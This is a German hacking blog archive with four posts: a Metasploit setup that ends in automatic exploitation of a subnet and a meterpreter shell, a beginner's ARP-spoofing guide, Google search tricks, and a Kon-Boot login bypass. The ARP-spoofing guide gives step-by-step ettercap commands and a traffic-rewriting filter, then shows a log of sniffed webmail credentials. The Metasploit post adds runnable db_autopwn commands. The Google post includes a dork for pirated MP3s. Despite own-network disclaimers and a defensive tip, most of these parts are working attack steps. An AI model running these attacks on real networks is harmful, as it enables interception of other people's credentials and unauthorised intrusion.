Category Archives: Hacken

Hacking, Cracking, W-LAN Sicherheit und vieles mehr …

Metasploit

Metasploit – Sicherheitsanalyse im Netzwerk


Metasploit
Metasploit


“Das Metasploit-Projekt ist ein freies Open-Source-Projekt zur Computersicherheit, das Informationen über Sicherheitslücken bietet und bei Penetrationstests sowie der Entwicklung von IDS-Signaturen eingesetzt werden kann. Das bekannteste Teilprojekt ist das Metasploit Framework, ein Werkzeug zur Entwicklung und Ausführung von Exploits gegen verteilte Zielrechner. Andere wichtige Teilprojekte sind das Shellcode-Archiv und Forschung im Bereich der IT-Sicherheit.

Wie vergleichbare kommerzielle Lösungen wie CANVAS (von Immunity) oder Core Impact (von Core Security Technology), kann Metasploit von Administratoren eingesetzt werden, um die Schwachstellen von Computersystemen zu prüfen und diese bei Bedarf zu schließen. Andererseits kann es auch missbraucht werden, um in andere Systeme einzubrechen. Während der beschriebene Einsatz durch einen Administrator in seinem eigenen Netzwerk nicht nur legitim, sondern auch legal ist, erfüllt ein Einsatz ohne ausdrückliche Erlaubnis bei Fremdsystemen Tatbestände der Computerkriminalität.” – Wiki


Achtung
Ausdrücklich möchte ich noch einmal darauf hinweisen, dass man dieses Programm nur zur Analyse des eigenen Netzwerkes nutzen darf!


hackingprocess
hackingprocess


Als erstes müssen wir einige Dinge nachinstallieren um “unser eigenes” Netzwerk bzw. die Rechner in diesem auf Exploits zu prüfen und spätestens jetzt bemerkt man, dass ein Patch-Day im Monat ggf. nicht ausreicht, sobald man auf eine globale Exploit-Datenbank zurückgreifen kann ;-)

aptitude install ruby postgres libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby  libreadline-ruby libiconv-ruby libgtk2-ruby libglade2-ruby rubygems libpq-dev libreadline-dev libssl-dev libpq5 ruby-dev
sudo gem install pg


Optional: falls du später Probleme hast, dich mir postgres-SQL zu verbinden
vim /etc/postgresql/8.3/main/postgresql.conf
#ssl = true
sudo /etc/init.d/postgresql restart


… und müssen eine Datenbank-User / Datenbank anlegen.
sudo -s
su postgres
createuser msf_user -P
Enter password for new role: *******
Enter it again: *******
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
createdb --owner=msf_user msf_database


Optional: weitere Infos zu Postgres + Metasploit


Optional: ggf. nach einer neuen Version schauen…


32-Bit:
wget http://www.metasploit.com/releases/framework-3.5.1-linux-i686.run
64-Bit:
wget http://www.metasploit.com/releases/framework-3.5.1-linux-x86_64.run


sudo sh ./framework-3.5.1*
sudo rm -rf /opt/metasploit3/msf3/
sudo svn checkout https://www.metasploit.com/svn/framework3/trunk /opt/metasploit3/msf3/


Optional: für zukünftige Updates
sudo svn update /opt/metasploit3/msf3/


Nun noch schnell das einen Link anlegen …
sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/


… und verhindern, dass PostgreSQL immer automatisch startet.
update-rc.d -f postgresql remove


Optional: ggf. falls der PC in der Zwischenzeit neu-gestartet wurde, starten wir nun PostgreSQL…


sudo /etc/init.d/postgresql start
… führen eben noch ein Update von Metasploit durch und startet diese anschließend …
sudo msfupdate
sudo msfconsole
*abwarten, kann einen Augenblick dauern*


metasploit
metasploit


msf > db_driver postgresql
msf > db_connect msf_user:[password]@127.0.0.1:5432/msf_database
msf > db_workspace -a meinProjekt
msf > db_nmap 192.168.50.0/24
msf > db_hosts
msf > db_services
msf > db_autopwn -t -p -e
msf > session -i 1
meterpreter >
Wir befinden uns nun in einer Shell auf dem Remote-PC und können verschiedene Befehle ausführen z.B.:
ipconfig
execute
shell
download
upload 
… genauer will ich auf die Shell auch nicht eingehen, denn weitere Infos findet man z.B. hier:


fastandeasyhacking
fastandeasyhacking


Wenn man gerne nun noch eine hübsche grafische Oberfläche hätte, kann man sich diese GUI installieren oder “msfgui” ausprobieren. :-) Um die neue Metasploit-GUI zu nutzen müssen wir jedoch als erstes Java installieren…
sudo add-apt-repository "deb http://archive.canonical.com/ lucid partner"
sudo apt-get update
sudo apt-get install sun-java6-jdk
Ggf. noch einmal nach einer neue Version auf der Webseite schauen – www.fastandeasyhacking.com
Optional: ggf. falls der PC in der Zwischenzeit neu-gestartet wurde, starten wir nun PostgreSQL…
sudo /etc/init.d/postgresql start
sudo msfconsole
*abwarten, kann einen Augenblick dauern*
msf > load xmlrpc
… nun steht in der Konsole ein Passwort (+User), welches gleich in der GUI eingegeben werden muss, also neue Konsole öffnen und anschließend die neue GUI herunterladen.
cd ~/Desktop/
wget http://www.fastandeasyhacking.com/download/armitage122210.tgz
tar xzvf armitage122210.tgz
cd armitage/
./armitage.sh
Nachdem die Software gestartet wurde, müssen wir noch schnell das soeben beschriebene Passwort (+User) und noch den Befehl zum Verbinden mit der Datenbank eintragen …
… anschließend können wir das Netzwerk scannen und ggf. Sicherheitslücken entdecken …


Armitage_start
Armitage_start


Menü:
Hosts -> Clear Hosts
Hosts -> Nmap Scan -> Quick Scan (OS detect)
Services
Services


Auswahl
Auswahl


… genauer will ich auf die GUI auch nicht eingehen, denn weitere Infos findet man z.B. hier:

1 Star2 Stars3 Stars4 Stars5 Stars (2 votes, average: 4.00 out of 5)
Angriff von innen

Hacken für Anfänger

Dieses HowTo zeigt wie einfach es ist einen Hack durchzuführen, wenn du mit deinem Laptop / PC einmal im lokalen Netz (LAN) bist. Eine kurze Einführung in die Thematik bevor es losgeht, wir wollen schließlich auch was lernen, :-) dazu versuche ich die Kommunikation zwischen zwei PCs möglichst einfach zu erklären und falls du etwas nicht verstehst, dann lese erst-einmal die folgende Erklärung bis zum Ende. Falls du dann noch fragen hast, kannst du diese unten per Kommentar stellen.


1.) Erklärung


1.1.) Am Anfang ist immer eine Information z.B. diese Webseite und damit Sender und Empfänge sich verstehen können, wurde vorher eine Sprache / Verfahren festgelegt, wie man diese Information darstellt. Das ist wie im wirklichen Leben, man kann nicht jede Information gleich behandel, es gibt wichtige, sensible Informationen und dann auch wieder irgendwelche Floskeln (Guten Tag!) die nicht sonderlich wichtig sind.


HTTP: Bei dieses Protokoll möchten wir, dass die Nachricht auch wirklich beim Empfänger ankommen. Es ist wie eine normale Unterhaltung zwischen zwei Personen, wenn der Empfänger etwas nicht verstanden hat (die Daten nicht korrekt angekommen sind), fragt er noch einmal nach. – Port 80


HTTPS: Dieses Protokoll ist für die bereits erwähnten sensiblen Daten gedacht, man kann sich dies auch als eine Unterhaltung zwischen zwei Personen vorstellen, jedoch mit dem Unterschied, dass die beiden sich vorher auf eine nur für Sie verständliche Kommunikation vereinbart haben. – Port 443


SMTP: Mithilfe von diesem Protokoll verschickt man E-Mails. Man kann sich das vorstellen, als ob man bei der Poststelle einen Brief abgibt, welcher dann erst-einmal gesammelt, verarbeitet und dann verschickt wird. Als erstes authentifiziert man sich und danach gibt man den kompletten Brief (E-Mail) am Schalter ab. – Port 25


Wenn du das Prinzip von SMTP selber testen möchtest, gehst du wie folgt vor.

auf deinem PC:

telnet "server" 25

HELO “server”

MAIL FROM:test@server.de

RCPT TO:test2@server2.de


Nun kannst du die E-Mail schrieben, mit einem “.” beendest du diese Eingabe und die Mail wird verschickt. Dies funktioniert natürlich nicht auf allen Servern, kannst es ja mal mit…

nc -v suckup.de 25

… ausprobieren, man erstelle Regel um zu verhindern, dass jeder einfach so E-Mails versenden kann und richtet eine Authentifizierung ein. Außerdem kannst du mit den hier genannten Programmen nicht nur mit den Port 25 (SMTP) verbinden, du kannst dich auch mit einem Web-Server (Port 80) und so weiter verbinden.


nc -v suckup.de 80



Mit dem folgendem Befehl, kannst du dir einige reservierte Protokolle + Ports ansehen.

cat /etc/protocols


Einen “Port“, kann man sich nun als Fernster an einem Haus (Computer) vorstellen, somit wäre unsere IP-Adresse, unsere Hausnummer und um mit unterschiedlichen Personen (Diensten) zu kommunizieren, klopfen wir an unterschiedlichen Fenstern. Die meisten Ports werden jedoch nicht reagieren, da sich in dem entsprechendem Raum niemand befindet und daher die Rollläden runtergelassen wurden (der Port geschlossen ist).


Wenn du das Prinzip von Ports selber testen möchtest, gehst du wie folgt vor.

1.) auf deinem PC: stellst du auf einem Port (3333) eine CD zur Verfügung

cat backup.iso | nc -l 3333

2.) und auf einen anderen PC im Netz: kann du die CD (ISO) nun empfangen

nc 192.168.0.1 3333 > backup.iso

-> weitere Infos zu nc


Somit gibt es noch etliche weitere Beispiele, wo Anwendungen durch ein bestimmtes Protokoll miteinander kommunizieren und wir hätten bereits die obersten Schichten 7 & 6 & 5 – die Anwendungs- & Darstellungs- & Sitzungsschicht die sogenannten “Anwendungsorientierten Schichten” grob erklärt. (wobei die letzte ein abgebrochenes Gespräch wieder an einer Vorherigen stelle beginnen kann… nur um dazu auch ein paar Wort verloren zu haben)


1.2.) Als nächstes müssen wir uns Vorstellen, dass diese ‘Sätze’ welche die Personen miteinander sprechen (also die Daten, welche Sie austauschen) nicht Satz für Satz gesprochen (übertragen) werden, sondern jedes Wort wird einzeln gesprochen und mit einer laufenden Nummer versehen.


z.B.:
Sender schickt folgendes Satz ->
1.Hallo 2.du 3.da, 4.was 5.geht?


Daten kommen durcheinander beim Empfänger an ->
4.was 2.du 1:Hallo 3.da 5.geht?


Und der Empfänger setzt den Satz wieder zusammen ->
Hallo du da, was geht?


Somit kann man die einzelnen Wörter auf verschiedenen Wegen zum Empfänger schicken und diese können zu verschiedenen Zeiten ankommen, der Empfänger versteht die Nachricht trotzdem. Außerdem kann es manchmal nötig sein, jemanden auf ein Gespräch hinzuweisen (Verbindung aufbauen) indem man z.B. dessen Hand schüttelt und der gegenüber nun weiß, dass nun die Kommunikation folgt und beim beendigen der selbigen, diesen Vorgang wiederholt. Falls man in diesem Fall etwas nicht verstanden hat (Daten auf dem Weg verloren gingen) kann man einfach noch einmal Nachfragen. (Drei-Wege-HandschlagTCP)


Es  gibt jedoch auch Situationen, wo es vorkommt, dass die Kommunikation bei einer “Frage” <-> “Antwort” bleib,. zum Beispiel die Frage nach dem Wetter. Und wenn man von seinem gegenüber keine Antwort bekommt, dann halt nicht ;-) und man fragt noch einmal. Dieses Prinzip wendet man z.B. bei der Auflösung von einer IP zum Hostnamen (DNS) an, um nicht zu viel Overhead (zu viel Aufwand, für eine so kurze Antwort) zu erzeugen. – (UDP)


Somit haben wir nun bereits die 4 Schicht – die Transportschicht erklärt.


1.3.) Stellen wir uns weiter vor, dass wir nicht direkt vor unserm Gesprächspartner stehen, sondern dieser weit weg ist, daher schicken wir die einzelnen Wörter nun per Post und verpacken die “Sätze” (Daten) -> “Wörter” (Segmente) -> in Kisten (Paketen). Diese Kisten wenden nun über mehrere Wege von verschiedenen Poststellen (Routern) zum Ziel geliefert.


Wenn du das Prinzip von IP-Adressen selber testen möchtest, gehst du wie folgt vor.

Als erstes schauen wir und unsere eigene IP-Adresse an.

ifconfig

Beispiel: Ausgabe

[...]
Link encap:Ethernet  Hardware Adresse 00:25:56:37:5b:96  
inet Adresse:192.168.2.103  Bcast:192.168.2.255  Maske:255.255.255.0
[...]

Hier können wir nun sehr viele hilfreiche Infos finden:

Hardware Adresse: deine (theoretisch) eindeutige MAC-Adresse

inter Adresse: deine IP-Adresse

Bcast: die letzte IP-Adresse in diesem Netzwerk

Mask: die Aufteilung von deinem Netz


In meinem Beispiel habe ich selber die IP-Adresse “192.168.2.103″ und die Netzmaske “255.255.255.0″ daraus ergibt sich die Broadcast-Adresse, indem man die einzelnen Zahlen Binär darstellt, das heißt:

00000001 = 1

00000010 = 2

00000011 = 3

[...]

11000000 10101000 00000010 01100111

+ 11111111 11111111 11111111 00000000

————————

11000000 10101000 00000010 00000000


Das heißt, wenn wir die Netzmaske Binär darstellen, sieht diese wie folgt aus:

255.255.255.0 -> 11111111 11111111 11111111 | 00000000

Und das wiederum heißt, dass wir 8 mal die 0 (Null) als unseren Hostanteil haben, der Rest kann weiter aufgeteilt werden, um so mehrer Netze zu schaffen – (Supernetting)

2⁸ = 256 – 1 (Braodcast) – 1 (Netzadresse)

254 -> Hostanteil

Man kann nun den Hostanteil auch anders darstellen.

24 x I -> /24


Mit diesen Infos können wir nun mithilfe von “nmap” das Netz nach aktiven PCs durchsuchen.

nmap -v -sP 192.168.2.255/24


Und ggf. auch nach offenen Ports im Netz suchen.

nmap -O -sS -sV -p 20-23,80,443 '192.168.2.*'


Und somit auch die 3 Schicht – die Vermittlungschicht abgeschlossen.


1.4.) Die Pakete kommen nun alle beim Hausmeister (Switch) an, dieser schreit nun durch das Treppenhaus, (Broadcast) wo Familie Müller wohnt (ARP) sollte sich nun zufällig ein böser Nachbar melden (ARP-Spoofing) und die Pakete annehmen, aufmachen, verändern, neu einpacken und an den ursprünglichen Empfänger weiterreichen, ohne das dieser davon etwas mitbekommt, haben wir eine sogenannte “Man In The Middle” Taktik angewandt.


Und somit die 2 Schicht – die Sicherungsschicht ausgetrickst.


1.5.) Vor nicht alt so langer Zeit, wurden keine Hausmeister eingesetzt, die waren zu teuer, ;-) da musste der arme Postbote (Hub) alle Pakete an alle Mieter im Haus ausliefern. (An alle Computer im Netz alle Pakete schicken.) Man kann sich vorstellen, was das für ein Durcheinander war und das dies zu Problemen führte.


Und somit auch die 1 Schicht – die Bitübertragungsschicht angesprochen.



Kommen wir zum Punkt. Brauchte man in älteren Netzwerken, deren PCs über einen Hub miteinander verbunden waren, somit nur ein Sniffer-Programm z.B. Ethereal, um den gesamten Datenverkehr mitzulesen. Muss man heute meist “ARP-Spoofing” und somit eine “Man In The Middle” Methode anwenden, um an diese Daten zu kommen.


Angriff von innen

2.) System vorbereiten


Welches Interface wird verwendet?

mein_interface="wlan0"
folgende Befehle ausführen
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/$mein_interface/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/$mein_interface/forwarding
echo 1 > /proc/sys/net/ipv4/conf/$mein_interface/log_martians
echo 1 > /proc/sys/net/ipv4/conf/$mein_interface/rp_filter
Nun installieren wie folgendes Programm: ettercap
aptitude install ettercap-common ettercap
Und passen dessen Konfiguration ein wenig an…
vim /etc/eppercap
…ec_uid & ec_gid auf 0 stellen…
[...]
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default
[...]
…und # vor den iptables-Regeln entfernen…
[...]
# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
[...]
…nun wechseln wir in folgendes Verzeichnis…
cd /usr/share/ettercap
(ggf. eigene Firewall ausschalten)
….und erstellen einen neuen Filter (neue Datei), welcher in “img”-Tag von HTML Dateien, welche per TCP von Port 80 verschickt wurden, ersetzt….
vim filter.pic
Inhalt:
if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
                replace("Accept-Encoding", "Accept-Rubbish!");
                msg("zapped Accept-Encoding!\n");
        }
}

if (ip.proto == TCP && tcp.src == 80) {
        replace("img src=", "img src=\"http://suckup.de/lars.png\" ");
        replace("IMG SRC=", "img src=\"http://suckup.de/lars.png\" ");
}
…nun übersetzten wir den neuen Filter…
etterfilter filter.pic -o filter.ef
…und starten das Programm…

3.) Hack durchführen

sudo ettercap -T -q -F filter.ef -M arp:remote /$IP/ -P autoadd
[...]
zapped Accept-Encoding!
zapped Accept-Encoding!
zapped Accept-Encoding!
HTTP : 217.188.35.145:443 -> USER: ******@web.de  PASS: *******  INFO: http://www.studivz.net/
zapped Accept-Encoding!
zapped Accept-Encoding!
zapped Accept-Encoding!
zapped Accept-Encoding!
[...]
Habe die Zugangsdaten in diesem Beispiel durch “*” ersetzt, in deinem Log stehen diese dann im Klartext. :-)
Bild-Fehler
Dies soll jedoch keineswegs eine Anleitung sein ein “böser” Hacker zu werden, sondern ich wollte verdeutlichen, wie einfach es ist einen solchen Hack durchzuführen und ggf. an sensible Daten zu kommen. Daher, solltest du solche oder ähnliche Fehlermeldungen im Browser sehen, solltest du sehr vorsichtig sein.
SSL-Fehler
Und dir ggf. folgendes Programm (auch für Windows verfügbar) installieren. -> XArp <-
Wer mehr Infos zu diesem Thema sucht, sollte sich den folgenden Artikel -> www.heise.de/security/artikel/Angriff-von-innen <- durchlesen und sich folgende PDF-Datei herunterladen -> pi1.informatik.uni-mannheim.de/filepool/teaching/sicherheit-2006/ITS_20061128.pdf <-
1 Star2 Stars3 Stars4 Stars5 Stars (11 votes, average: 4.64 out of 5)
Google

Google Hacks und Tricks

In letzter Zeit sind einige neue Suchmaschinen erschienen z.B. www.wolframalpha.com, www.bing.com nur um zwei zu nennen, doch warum sollte man eine neue Suchmaschine benutzen, wenn man nicht einmal richtig mit google umgehen kann… also hier ein paar kleine Tricks und Hacks mit google.

Auf folgender Webseite, kann man ausprobieren, welche Suchmaschinen die besten Ergebnisse erzielt.
blindsearch.fejus.com


Informationen

lexikon


definiere

< - im Suchfeld, bewirkt, dass google eine Definition des Wortes test sucht.

z.B.:

definiere ubuntu

www.google.de/search?q=definiere+ubuntu


wetterwetter

< - gefolgt von einem Städtenamen, im Suchfeld bewirkt, dass google, wenn wundert es das Wetter anzeigt.

z.B.:

Wetter Duisburg

www.google.de/search?q=Wetter+Duisburg


plz-karte

PLZ

Wenn du die entsprechende Postleitzahl -> PLZ < - einer Stadt gerade entfallen ist, kannst du auch diese mit google anzeigen lassen.

z.B.:

PLZ Dinslaken

www.google.de/search?q=PLZ+Dinslaken



Pizza

Pizzeria

Falls du nach einer -> Pizzeria < - suchst, hilft dir google auch weiter...

z.B.:

Pizzeria 46562

www.google.de/search?q=Pizzeria+46562

oder

Pizzeria Voerde

www.google.de/search?q=Pizzeria+Voerde


kino

Kino

Google findet auch alle Kinos und dessen aktuelles Programm mittels -> kino < - gefolgt von einem Städtenamen

z.B.:

kino Dinslaken

www.google.de/search?q=kino+Dinslaken

oder

kino 46537

www.google.de/search?q=Kino+46537


movie film

< - im Suchfeld bewirkt, dass google die entsprechenden Kinos sucht, wo dieser Film gezeigt wird

z.B.:

movie eclipse

www.google.de/movies?q=eclipse


imdb fiml

< - im Suchfeld bewirkt, dass google direkt die entsprechenden Film-Bewertung anzeigt

imdb eclipse

Globus

www.google.de/search?q=imdb+eclipse


google-Karte

Außerdem ist googleMaps in google integriert, so dass man sich sofort eine -> kart < - eines Ortes anzeigen lassen kann.

z.B.:

karte EU

www.google.de/search?q=karte+EU

PS: bei Städten, wird die Karte standardmäßig über den Suchergebnissen angezeigt


fussball



Fußballmannschaft

Um sich die Spielpläne für bestimmte -> Fußballmannschaft < - anzeigen zu lassen, reicht es aus, dessen Namen einzugeben.

z.B.:

FC Bayern München

www.google.de/search?q=FC+Bayern+M%FCnchen


deutsche_bahn



Zugverbindung

Wenn man seine nächste Zugverbindung wissen möchte, kann man dies auch sofort mit google ermitteln.

z.B.:

Voerde Mönchengladbach 13:30

www.google.de/search?q=Voerde+M%C3%B6nchengladbach+13%3A30


Pakete



Paketnummern

< - von UPS-, Fedex- oder USPS-Paketen können ebenfalls bei google gesucht werden, um den Status der Lieferung in Erfahrung zu bringen...

z.B.:

1Z9999W99999999999

www.google.de/search?q=1Z9999W99999999999


Rechtschreibung



Rechtschreibprüfung

Zudem hat google wie den meisten bereits bekannt sein dürfte eine eingebaute -> Rechtschreibprüfung < -

z.B.:

Wolfgang Göte

www.google.de/search?q=Wolfgang+Göte


Betriebssystem

Wer speziell Infos zu BSD, Linux oder Windows sucht, der kann es einmal mit den folgenden Google-Suchen probieren.


www.google.com/bsd

www.google.com/linux

www.google.com/microsoft


taschenrechner

um- / rechnen mit Google

Zudem kann google auch noch sehr gut um/rechnen, dazu geben Sie z.B. folgende Dinge im Suchfeld ein:

z.B.:

100 / 100 * 99 / 3 ^ 2


www.google.de/search?source=hp&q=100+%2F+100+*+99+%2F+3+^+2

sin(90) / cos (45)

www.google.de/search?q=sin%2890%29+%2F+cos+%2845%29

pi*2

www.google.de/search?q=pi*2

50 Euro in dollar

www.google.de/search?q=50+Euro+in+dollar

oder

50 € in $

www.google.de/search?q=50+%E2%82%AC+in+%24

10 MB in KB

www.google.de/search?q=10+MB+in+KB

10 ha in m^2

http://www.google.de/search?q=10+ha+in+m%5E2

10 g in t

www.google.de/search?q=10+g+in+t

oder

10 gramm in tonnen

www.google.de/search?q=10+gramm++in+tonnen

13 Meilen in km

www.google.de/search?q=13+Meilen+in+km


Spezialisierung von Suchanfragen (einfach)


“-”

Ein “-” im Suchfeld, wirkt als Filter und nimmt alle Ergebnisse mit dem folgendem Wort aus den Ergebnissen.

z.B.:

voku -online

www.google.de/search?q=voku+-online


“+”

Im Gegensatz dazu bewirkt ein “+” im Suchfeld, dass das folgende Wort auf jedenfall im Ergebnis vorhanden sein muss.

z.B.:

voku +online

www.google.de/search?q=voku+%2Bonline


“~”

Das “~” im Suchfeld hat zur folge, dass man auch Dinge die mit dem folgendem Wort zu tun haben, angezeigt bekommt

z.B.:

~linux

www.google.de/search?q=%7Elinux


“”

Das hinzufügen von “” Anführungszeichen in der Suchfeld, bewirkt, dass man nur genau diesen Satz sucht und nicht nach allen einzelnen Wörter.

z.B.:

“Dieser Blog-Eintrag wird immer oben stehen bleiben”

www.google.de/search?q=%22Dieser+Blog-Eintrag+wird+immer+oben+stehen+bleiben%22


“*”

Das “*” im Suchfeld bewirkt, dass da noch irgendwas zwischen dem Wort davor und dem Wort danach stehen muss.

z.B.:

“die * besten Distribution”

www.google.de/search?q=%22die+*+besten+Distribution%22


“%”

Das “%” im Suchfeld bewirkt, dass da noch ein Zeichen zwischen dem Wort davor und dem Wort danach stehen muss.

z.B.:

“voku%online”

www.google.de/search?q=%22voku%25online%22


Spezialisierung von Suchanfragen (hardcore)


inurl:text

< - im Suchfeld, bewirkt, dass google nur noch Ergebnisse anzeigt, in dessen URL "text" vorkommt.

z.B.:

inurl:news voku

www.google.de/search?q=inurl%3Anews+voku

allinurl:voku firefox

www.google.de/search?q=allinurl%3Avoku+firefox


intitle:text

< - im Suchfeld, bewirkt, dass google nur noch Ergebnisse anzeigt, in dessen Titel "text" vorkommt.

z.B:

intitle:e107 voku

www.google.de/search?q=intitle%3Ae107+voku

allintitle: download news voku

www.google.de/search?q=allintitle%3A+download+news+voku


intext:text

< - im Suchfeld, bewirkt, dass google nur noch Ergebnisse anzeigt, in dessen Inhalt "text" vorkommt.

z.B.:

intext:bash voku

www.google.de/search?q=intext%3Abash+voku

allintext:voku bash

www.google.de/search?q=allintext%3Avoku+bash


| (OR)

Ein -> | < - oder -> OR < - steht für "oder"...

z.B:

intitle:”download|news” voku

www.google.de/search?q=intitle%3A%22download%7Cnews%22+voku

oder

intitle:”download OR news” voku

www.google.de/search?q=intitle%3A%22download+OR+news%22+voku&btnG=Suche


site:test.de

< - im Suchfeld, bewirkt, dass google nur noch Ergebnisse anzeigt, die von der Webseite "test.de" stammen.

z.B.:

site:suckup.de ubuntu

www.google.de/search?q=site%3Asuckup.de+ubuntu


link:test.de

< - bewirkt, dass google alle Links die zu "test.de" zeigen anzeigt.

z.B.:

link:www.heise.de -site:heise.de

www.google.de/search?q=link%3Awww.heise.de+-site%3Aheise.de


daterange:….

< - im Suchfeld, bewirkt, dass google in einem bestimmten Zeitraum sucht, jedoch muss das Datum eines gregorianischen Kalenders zuvor in ein julianisches Datum umwandelt werden.

Datum umrechnen -> Link

z.B.:

daterange:2454624-2455354 voku

www.google.de/search?q=daterange%3A2454624-2455354+voku


&as_qdr=d/w/m/y

Das hinzufügen von “&as_qdr=d/w/m/y” in die URL von google bewirkt, dass man nur die Suchergebnisse der vergangenen Tage, Wochen… angezeigt bekommt.

&as_qdr=d
-> 1 Tag (day)

&as_qdr=d7
-> 7 Tage

&as_qdr=w
-> 1 Woche (week)

&as_qdr=w4
-> 4 Wochen

&as_qdr=m
-> 1 Monat (month)

&as_qdr=m6
-> 6 Monate

&as_qdr=y
-> 1 Jahre (year)

&as_qdr=y2
-> 2 Jahre

z.B.:
www.google.com/search?q=voku&as_qdr=d


filetype:abc

< - im Suchfeld bewirkt, dass google nur noch Ergebnisse anzeigt, welche vom Type "abc" sind.

Folgende Dateitypen kann google direkt suchen:

Adobe Portable Document Format (pdf)
Adobe PostScript (ps)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Lotus WordPro (lwp)
MacWrite (mw)
Microsoft Excel (xls)
Microsoft PowerPoint (ppt)
Microsoft Word (doc)
Microsoft Works (wks, wps, wdb)
Microsoft Write (wri)
Rich Text Format (rtf)
Shockwave Flash (swf)
Text (ans, txt)

z.B.:

filetype:txt zsh suckup

www.google.de/search?q=filetype%3Atxt+zsh+suckup


cache:test.de

< - im Suchfeld bewirkt, dass man den Cache von google angezeigt bekommt.

z.B.:

cache:suckup.de

webcache.googleusercontent.com/search?q=cache:suckup.de


related:test.de

< - im Suchfeld bewirkt, dass man so ähnliche Seiten wie "test.de" angezeigt bekommt.

z.B.:

related:test.de

www.google.de/search?q=related%3Atest.de

“..”

Die beiden Punkte “..” im Suchfeld bewirkt, dass google Ergebnisse zwischen zwei werten anzeigt.

z.B.:

mp3 player “2..5 gigabyte”

www.google.de/search?q=mp3+player+%222..5+gigabyte%22

Laptop “100..350 euro”

www.google.de/search?q=Laptop+%22100..350+euro%22


images.google

Hier noch ein “images.google” Trick… wenn man mit der Bilder-Suche von google nach “paris” sucht bekommt man ein bunte Mischung aus verschiedenen Bilder, wenn man jedoch in der URL folgendes ergänzt -> &imgtype=face < -, sieht das Ergebnis ein wenig anders aus.

z.B.:
images.google.com/images?q=paris

images.google.com/images?q=paris&imgtype=face


MP3-Download

Falls du einen Musik-Titel (Download) suchst, hilft dir google auch weiter…

z.B.:

intitle:index.of + mp3 + “Männer Sind Schweine” -html -htm -php -asp -txt -pls

www.google.de/search?q=intitle%3Aindex.of+%2B+mp3+%2B+”Männer+Sind+Schwein…

PS: Auch das Herunterladen von Musik Dateien kann strafbar sein. Der GoogleWatchBlog und seine Mitarbeiter übernehmen keine Haftung für eventuelle straf- und zivilrechtlichen Folgen.



viel Spaß beim ausprobieren… :-)

1 Star2 Stars3 Stars4 Stars5 Stars (1 votes, average: 5.00 out of 5)

Hack your System – Kon-Boot

Mit folgender Live-Hack-CD kannst du, falls du dein Passwort vergessen hast, es wiederherstellen bzw. es zurücksetzen. Dies wurde bereits erfolgreich mit folgenden Windows Versionen getestet…

- Windows Server 2008 Standard SP2 (v.275)
– Windows Vista Business SP0
– Windows Vista Ultimate SP1
– Windows Vista Ultimate SP0
– Windows Server 2003 Enterprise
– Windows XP
– Windows XP SP1
– Windows XP SP2
– Windows XP SP3
– Windows 7


Diese Live-CD beschränkt sich jedoch beim zurück setzten des Passwortes nicht nur auf Windows, es wurde ebenfalls auf folgenden Distributionen erfolgreich angewendet.

- Gentoo 2.6.24-gentoo-r5 (GRUB 0.97)
– Ubuntu 2.6.24.3-debug (GRUB 0.97)
– Debian 2.6.18-6-6861 (GRUB 0.97)
– Fedora 2.6.25.9-76.fc9.i6862 (GRUB 0.97)



Download:
www.piotrbania.com/all/kon-boot/

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 3.75 out of 5)